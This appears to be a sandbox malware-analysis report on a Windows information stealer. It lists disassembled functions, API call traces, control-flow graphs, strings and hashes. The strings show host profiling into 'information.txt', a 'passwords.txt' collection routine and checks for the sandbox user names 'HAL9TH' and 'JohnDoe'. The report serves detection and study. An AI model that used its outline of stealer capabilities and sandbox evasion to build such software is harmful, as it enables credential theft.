                                                                                                                                                                                                                                                                • Part of subcall function 0040EEF9: CharToOemA.USER32(?,?), ref: 0040EF77
                                                                                                                                                                                                                                                                • Part of subcall function 0040EF86: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040EF97
                                                                                                                                                                                                                                                                • Part of subcall function 0040EFC1: _EH_prolog.MSVCRT ref: 0040EFC6
                                                                                                                                                                                                                                                                • Part of subcall function 0040EFC1: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040EFE9
                                                                                                                                                                                                                                                                • Part of subcall function 0040EFC1: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F01B
                                                                                                                                                                                                                                                                • Part of subcall function 0040EFC1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F05E
                                                                                                                                                                                                                                                                • Part of subcall function 0040EFC1: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F065
                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004244F8,00000000,?,00000000,00000000,?,HWID: ,00000000,?,004244EC,00000000), ref: 00413470
                                                                                                                                                                                                                                                                • Part of subcall function 0040FA83: OpenProcess.KERNEL32(00000410,00000000,00413480), ref: 0040FA9B
                                                                                                                                                                                                                                                                • Part of subcall function 0040FA83: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0040FAB6
                                                                                                                                                                                                                                                                • Part of subcall function 0040FA83: CloseHandle.KERNEL32(00000000), ref: 0040FABD
                                                                                                                                                                                                                                                                • Part of subcall function 0040F12F: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C,00000000,?,Work Dir: In memory), ref: 0040F143
                                                                                                                                                                                                                                                                • Part of subcall function 0040F12F: HeapAlloc.KERNEL32(00000000,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F14A
                                                                                                                                                                                                                                                                • Part of subcall function 0040F242: _EH_prolog.MSVCRT ref: 0040F247
                                                                                                                                                                                                                                                                • Part of subcall function 0040F242: CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000), ref: 0040F257
                                                                                                                                                                                                                                                                • Part of subcall function 0040F242: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,0042451C), ref: 0040F268
                                                                                                                                                                                                                                                                • Part of subcall function 0040F242: CoCreateInstance.OLE32(00424EE8,00000000,00000001,00424E18,?,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000), ref: 0040F282
                                                                                                                                                                                                                                                                • Part of subcall function 0040F242: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,0042451C,00000000), ref: 0040F2B8
                                                                                                                                                                                                                                                                • Part of subcall function 0040F242: VariantInit.OLEAUT32(?), ref: 0040F313
                                                                                                                                                                                                                                                                • Part of subcall function 0040F3CB: _EH_prolog.MSVCRT ref: 0040F3D0
                                                                                                                                                                                                                                                                • Part of subcall function 0040F3CB: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000,?,00000000), ref: 0040F3E0
                                                                                                                                                                                                                                                                • Part of subcall function 0040F3CB: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424504), ref: 0040F3F1
                                                                                                                                                                                                                                                                • Part of subcall function 0040F3CB: CoCreateInstance.OLE32(00424EE8,00000000,00000001,00424E18,?,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000,?,00000000), ref: 0040F40B
                                                                                                                                                                                                                                                                • Part of subcall function 0040F3CB: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000), ref: 0040F441
                                                                                                                                                                                                                                                                • Part of subcall function 0040F3CB: VariantInit.OLEAUT32(?), ref: 0040F490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E683: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,0040104D,HAL9TH,00415B49), ref: 0040E68F
                                                                                                                                                                                                                                                                • Part of subcall function 0040E683: HeapAlloc.KERNEL32(00000000,?,?,0040104D,HAL9TH,00415B49), ref: 0040E696
                                                                                                                                                                                                                                                                • Part of subcall function 0040E683: GetComputerNameA.KERNEL32(00000000,?), ref: 0040E6AA
                                                                                                                                                                                                                                                                • Part of subcall function 0040E651: GetProcessHeap.KERNEL32(00000000,00000104,00000000,HAL9TH,?,00401063,JohnDoe,00415B49), ref: 0040E65D
                                                                                                                                                                                                                                                                • Part of subcall function 0040E651: HeapAlloc.KERNEL32(00000000,?,00401063,JohnDoe,00415B49), ref: 0040E664
                                                                                                                                                                                                                                                                • Part of subcall function 0040E651: GetUserNameA.ADVAPI32(00000000,?), ref: 0040E678
                                                                                                                                                                                                                                                                • Part of subcall function 0040EE84: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0040EE99
                                                                                                                                                                                                                                                                • Part of subcall function 0040EE84: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040EEA4
                                                                                                                                                                                                                                                                • Part of subcall function 0040EE84: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040EEAF
                                                                                                                                                                                                                                                                • Part of subcall function 0040EE84: ReleaseDC.USER32(00000000,00000000), ref: 0040EEBA
                                                                                                                                                                                                                                                                • Part of subcall function 0040EE84: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,0041380E,?,00000000,?,Display Resolution: ,00000000,?,00424570,00000000,?), ref: 0040EEC6
                                                                                                                                                                                                                                                                • Part of subcall function 0040EE84: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,0041380E,?,00000000,?,Display Resolution: ,00000000,?,00424570,00000000,?,00000000), ref: 0040EECD
                                                                                                                                                                                                                                                                • Part of subcall function 0040EE84: wsprintfA.USER32 ref: 0040EEDF
                                                                                                                                                                                                                                                                • Part of subcall function 0040E76B: _EH_prolog.MSVCRT ref: 0040E770
                                                                                                                                                                                                                                                                • Part of subcall function 0040E76B: GetKeyboardLayoutList.USER32(00000000,00000000,004241B7,00000000,?,00000000), ref: 0040E7A2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E76B: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040E7B0
                                                                                                                                                                                                                                                                • Part of subcall function 0040E76B: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040E7BB
                                                                                                                                                                                                                                                                • Part of subcall function 0040E76B: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040E7E5
                                                                                                                                                                                                                                                                • Part of subcall function 0040E76B: LocalFree.KERNEL32(?), ref: 0040E889
                                                                                                                                                                                                                                                                • Part of subcall function 0040E718: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,0042454C,00000000,?,00000000,00000000,?,AV: ), ref: 0040E729
                                                                                                                                                                                                                                                                • Part of subcall function 0040E718: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042454C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040E730
                                                                                                                                                                                                                                                                • Part of subcall function 0040E718: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042454C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040E73F
                                                                                                                                                                                                                                                                • Part of subcall function 0040E718: wsprintfA.USER32 ref: 0040E75D
                                                                                                                                                                                                                                                                • Part of subcall function 0040E89E: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004245CC), ref: 0040E8B2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E89E: HeapAlloc.KERNEL32(00000000,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004245CC,00000000,?), ref: 0040E8B9
                                                                                                                                                                                                                                                                • Part of subcall function 0040E89E: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040E8D7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E89E: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040E8F3
                                                                                                                                                                                                                                                                • Part of subcall function 0040E93A: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040E98D
                                                                                                                                                                                                                                                                • Part of subcall function 0040E93A: wsprintfA.USER32 ref: 0040E9D3
                                                                                                                                                                                                                                                                • Part of subcall function 0040E907: GetSystemInfo.KERNEL32(00000000), ref: 0040E914
                                                                                                                                                                                                                                                                • Part of subcall function 0040E907: wsprintfA.USER32 ref: 0040E929
                                                                                                                                                                                                                                                                • Part of subcall function 0040EA07: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000,?,Windows: ,00000000,?,0042451C,00000000,?,Work Dir: In memory,00000000,?,00424504), ref: 0040EA15
                                                                                                                                                                                                                                                                • Part of subcall function 0040EA07: HeapAlloc.KERNEL32(00000000), ref: 0040EA1C
                                                                                                                                                                                                                                                                • Part of subcall function 0040EA07: GlobalMemoryStatusEx.KERNEL32 ref: 0040EA3C
                                                                                                                                                                                                                                                                • Part of subcall function 0040EA07: wsprintfA.USER32 ref: 0040EA62
                                                                                                                                                                                                                                                                • Part of subcall function 0040EA70: _EH_prolog.MSVCRT ref: 0040EA75
                                                                                                                                                                                                                                                                • Part of subcall function 0040EA70: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 0040EB36
                                                                                                                                                                                                                                                                • Part of subcall function 0040EDA7: _EH_prolog.MSVCRT ref: 0040EDAC
                                                                                                                                                                                                                                                                • Part of subcall function 0040EDA7: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040EDE7
                                                                                                                                                                                                                                                                • Part of subcall function 0040EDA7: Process32First.KERNEL32(00000000,00000128), ref: 0040EDF8
                                                                                                                                                                                                                                                                • Part of subcall function 0040EDA7: Process32Next.KERNEL32(?,00000128), ref: 0040EE60
                                                                                                                                                                                                                                                                • Part of subcall function 0040EDA7: CloseHandle.KERNEL32(?,?,00000000), ref: 0040EE6D
                                                                                                                                                                                                                                                                • Part of subcall function 0040EB55: _EH_prolog.MSVCRT ref: 0040EB5A
                                                                                                                                                                                                                                                                • Part of subcall function 0040EB55: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004241CF,00000000,00000000), ref: 0040EBA2
                                                                                                                                                                                                                                                                • Part of subcall function 0040EB55: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040EBEC
                                                                                                                                                                                                                                                                • Part of subcall function 0040EB55: wsprintfA.USER32 ref: 0040EC16
                                                                                                                                                                                                                                                                • Part of subcall function 0040EB55: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040EC33
                                                                                                                                                                                                                                                                • Part of subcall function 0040EB55: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040EC5D
                                                                                                                                                                                                                                                                • Part of subcall function 0040EB55: lstrlen.KERNEL32(?), ref: 0040EC72
                                                                                                                                                                                                                                                                • Part of subcall function 0040EB55: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00424200), ref: 0040ECF2
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,00424644,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00424634), ref: 00413F04
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                                • Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                              • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $V$Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                              • API String ID: 722754166-310184570
                                                                                                                                                                                                                                                              • Opcode ID: 811b7d68a6cfe72faf9ee324c155fb842fa9fd7ce8a615f2435f4a0874e4aef8
                                                                                                                                                                                                                                                              • Instruction ID: 5f778280f23de2a4fdb259b6ccf19d94640144d39d4e386dcb251b8ba5580ae4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 811b7d68a6cfe72faf9ee324c155fb842fa9fd7ce8a615f2435f4a0874e4aef8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BA22371800288E9DB05E7E2C956BEEBF785F14308F1444AEA541732C2DF782B59DBB6
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040B9EF
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?,00423B76,00000000), ref: 0040BAAD
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040BB0E
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0040BB15
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000), ref: 0040BBA6
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 0040BBBE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040BBD0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423B7C), ref: 0040BBDE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040BBF0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423B80), ref: 0040BBFE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 0040BC0D
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040BC1F
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423B84), ref: 0040BC2D
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 0040BC3C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040BC4E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423B88), ref: 0040BC5C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 0040BC6B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040BC7D
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423B8C), ref: 0040BC8B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423B90), ref: 0040BC99
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040BCCD
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040BD20
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040BD4D
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: _EH_prolog.MSVCRT ref: 00406363
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: memcmp.MSVCRT ref: 00406389
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: memset.MSVCRT ref: 004063B8
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 004063ED
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                                                                                                                                                                                              • String ID: passwords.txt
                                                                                                                                                                                                                                                              • API String ID: 3298853120-347816968
                                                                                                                                                                                                                                                              • Opcode ID: 8454bc0e9691c7399795ad14da3f904abbb74f93ebf0461abe4fa8449db9faa8
                                                                                                                                                                                                                                                              • Instruction ID: eacfe064167263d56a5f39260bca9470ec76c25b5eb96d500bc3926372bb56e9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8454bc0e9691c7399795ad14da3f904abbb74f93ebf0461abe4fa8449db9faa8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DB13B71800109EFDB05EBE1ED4AAEEBB75FF14308F14482AF411721E2DB786A25DB65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1980 412358-412411 _EH_prolog call 411ff8 call 40e35e * 3 call 40e2ea * 6 2001 412415-41241c call 402247 1980->2001 2004 412422-4124c0 call 4020bd call 40e3a8 call 40e355 call 4020f1 call 40e321 * 2 call 401128 call 411a77 call 40e3a8 2001->2004 2005 4124c5-412546 call 4020bd call 4020d7 call 401128 call 411b64 call 40e3a8 call 40e355 call 40e521 StrCmpCA 2001->2005 2047 4125bd-4125c1 call 40e355 2004->2047 2034 4125c6-4125dc call 40e521 StrCmpCA 2005->2034 2035 412548-41259f call 4020f1 call 40e321 * 2 call 401128 call 411a77 2005->2035 2044 4125e2-4125e9 call 402243 2034->2044 2045 412e94-412ef6 call 40e3a8 call 4020f1 call 40e3a8 call 40e355 call 40224a call 40e3a8 call 40e355 call 411d25 2034->2045 2076 4125a4-4125b7 call 40e3a8 2035->2076 2056 41279d-4127b3 call 40e521 StrCmpCA 2044->2056 2057 4125ef-4125f6 call 402247 2044->2057 2140 412efb-412f6f call 40e355 * 6 call 411ce1 call 4010d8 2045->2140 2047->2034 2071 4127b9-4127c0 call 402247 2056->2071 2072 412e4c-412e8f call 40e3a8 call 40213f call 40e3a8 call 40e355 call 402264 2056->2072 2068 41269c-41271d call 40210b call 402125 call 401128 call 411b64 call 40e3a8 call 40e355 call 40e521 StrCmpCA 2057->2068 2069 4125fc-412697 call 40210b call 40e3a8 call 40e355 call 40213f call 40e321 call 40210b call 401128 call 411a77 call 40e3a8 2057->2069 2068->2056 2198 41271f-41278e call 40213f call 40e321 * 2 call 401128 call 411a77 call 40e3a8 2068->2198 2246 412794-412798 call 40e355 2069->2246 2086 412974-41298a call 40e521 StrCmpCA 2071->2086 2087 4127c6-4127cd call 402247 2071->2087 2148 412df9-412e05 call 40e3a8 2072->2148 2076->2047 2108 412990-412997 call 402247 2086->2108 2109 412e07-412e4a call 40e3a8 call 40218d call 40e3a8 call 40e355 call 40227e 2086->2109 2106 412873-4128f4 call 402159 call 402173 call 401128 call 411b64 call 40e3a8 call 40e355 call 40e521 StrCmpCA 2087->2106 2107 4127d3-41286e call 402159 call 40e3a8 call 40e355 call 40218d call 40e321 call 402159 call 401128 call 411a77 call 40e3a8 2087->2107 2106->2086 2258 4128f6-412965 call 40218d call 40e321 * 2 call 401128 call 411a77 call 40e3a8 2106->2258 2302 41296b-41296f call 40e355 2107->2302 2135 412b4b-412b61 call 40e521 StrCmpCA 2108->2135 2136 41299d-4129a4 call 402247 2108->2136 2109->2148 2155 412b67-412b6e call 402247 2135->2155 2156 412db6-412df5 call 40e3a8 call 4021db call 40e3a8 call 40e355 call 402298 2135->2156 2164 412a4a-412acb call 4021a7 call 4021c1 call 401128 call 411b64 call 40e3a8 call 40e355 call 40e521 StrCmpCA 2136->2164 2165 4129aa-412a45 call 4021a7 call 40e3a8 call 40e355 call 4021db call 40e321 call 4021a7 call 401128 call 411a77 call 40e3a8 2136->2165 2186 412d99-412db1 call 40e355 call 411d25 2148->2186 2192 412b74-412b7b call 402247 2155->2192 2193 412d1c-412d32 call 40e521 StrCmpCA 2155->2193 2156->2148 2164->2135 2314 412acd-412b3c call 4021db call 40e321 * 2 call 401128 call 411a77 call 40e3a8 2164->2314 2342 412b42-412b46 call 40e355 2165->2342 2186->2140 2228 412c21-412ca2 call 4021f5 call 40220f call 401128 call 411b64 call 40e3a8 call 40e355 call 40e521 StrCmpCA 2192->2228 2229 412b81-412c1c call 4021f5 call 40e3a8 call 40e355 call 402229 call 40e321 call 4021f5 call 401128 call 411a77 call 40e3a8 2192->2229 2231 412d44-412d93 call 40e3a8 call 402229 call 40e3a8 call 40e355 call 4022b2 call 40e3a8 2193->2231 2232 412d34-412d3f Sleep 2193->2232 2198->2246 2228->2193 2352 412ca4-412d10 call 402229 call 40e321 * 2 call 401128 call 411a77 call 40e3a8 2228->2352 2363 412d13-412d17 call 40e355 2229->2363 2231->2186 2232->2001 2246->2056 2258->2302 2302->2086 2314->2342 2342->2135 2352->2363 2363->2193
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0041235D
                                                                                                                                                                                                                                                                • Part of subcall function 00411FF8: _EH_prolog.MSVCRT ref: 00411FFD
                                                                                                                                                                                                                                                                • Part of subcall function 0040E35E: lstrlen.KERNEL32(?,00000000,?,00415304,004244B3,004244B2,00000000,00000000,?,00415CB7), ref: 0040E367
                                                                                                                                                                                                                                                                • Part of subcall function 0040E35E: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E39B
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041253E
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004125D4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00411A77: _EH_prolog.MSVCRT ref: 00411A7C
                                                                                                                                                                                                                                                                • Part of subcall function 00411A77: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00411ADA
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412715
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004127AB
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004128EC
                                                                                                                                                                                                                                                                • Part of subcall function 00411B64: _EH_prolog.MSVCRT ref: 00411B69
                                                                                                                                                                                                                                                                • Part of subcall function 00411B64: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00411BEB
                                                                                                                                                                                                                                                                • Part of subcall function 00411B64: lstrlen.KERNEL32(00000000), ref: 00411C02
                                                                                                                                                                                                                                                                • Part of subcall function 00411B64: StrStrA.SHLWAPI(00000000,00000000), ref: 00411C29
                                                                                                                                                                                                                                                                • Part of subcall function 00411B64: lstrlen.KERNEL32(00000000), ref: 00411C3E
                                                                                                                                                                                                                                                                • Part of subcall function 00411B64: lstrlen.KERNEL32(00000000), ref: 00411C59
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412982
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412AC3
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412B59
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412C9A
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412D2A
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000EA60), ref: 00412D39
